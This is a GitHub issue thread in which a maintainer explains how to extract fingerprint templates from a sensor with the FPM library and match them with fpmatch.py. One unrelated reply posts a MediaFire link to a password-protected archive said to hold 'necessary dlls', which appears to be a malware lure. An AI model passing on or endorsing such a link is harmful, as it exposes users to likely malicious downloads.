### ISSUE TITLE
download template fingerprint to pc

### ISSUE THREAD

**Issue by ariessetiyawan** [brianrho/FPM#56]
How to get fingerprint template so it can be used as data for fpmatch.py ​​(https://github.com/brianrho/fpmatch), can I use image_to_pc example (https://github.com/brianrho/FPM/tree/master/examples/image_to_pc)

**Comment by SagarChandra07** [comment]
maybe this will help
https://www.mediafire.com/file/q4gho1ar8e43udd/fix.zip/file

Password: changeme
I put the necessary dlls in the archive

**Comment by ariessetiyawan** [comment]
> I put the necessary dlls in the archive

Can you explain in detail how to use it?

**Comment by brianrho** [comment]
- You should use/modify the `templates` example to extract all the fingerprints templates you want to search (i.e. your database), into arrays -- the `template_buffer` variable holds each template after `readTemplate` has been called, and this template is also printed in your serial monitor. 

- Put all those template arrays (as a list of `bytearray`s perhaps) into a Python module, which will serve as your fingerprint database. 

- To search for a fingerprint, you need to first capture the unknown/input fingerprint for which you're looking for a match. The `enroll` example shows how you can `getImage()` and then convert that image into a template stored in one of the sensor's buffers. You can then use some of the logic in `readTemplate()` to download the template from that sensor buffer into your Arduino's RAM `template_buffer`, just like in the `templates` example. Copy this "unknown template" to your Python module.

- Finally, use `fpmatch.py` to iterate through your database and compare each template against your "unknown template" until you get a match (or not).

**Comment by ariessetiyawan** [comment]
I have been able to download the fingerprint template from the example you made, but I am not clear with this explanation,

>   To search for a fingerprint, you need to first capture the unknown/input fingerprint for which you're looking for a match. The enroll example shows how you can getImage() and then convert that image into a template stored in one of the sensor's buffers. You can then use some of the logic in readTemplate() to download the template from that sensor buffer into your Arduino's RAM template_buffer, just like in the templates example. Copy this "unknown template" to your Python module.

 but I will try to understand by trying to make the code...
 
 To be able to take a fingerprint template, do you have to take 2 steps as in your example? Can I only enroll once?...

**Comment by brianrho** [comment]
You can just do it once i.e. call `getImage()` to get an image, `image2Tz()` to convert the image to a template, `readTemplate()` to extract that template and print it to your Serial monitor. This is your "unknown/input fingerprint" i.e. `userInput` which is to be searched for in your database `database = [correctMatch, template1, template2]`, to find a match.

**Comment by ariessetiyawan** [comment]
ok, thanks for your help...my problem solved...
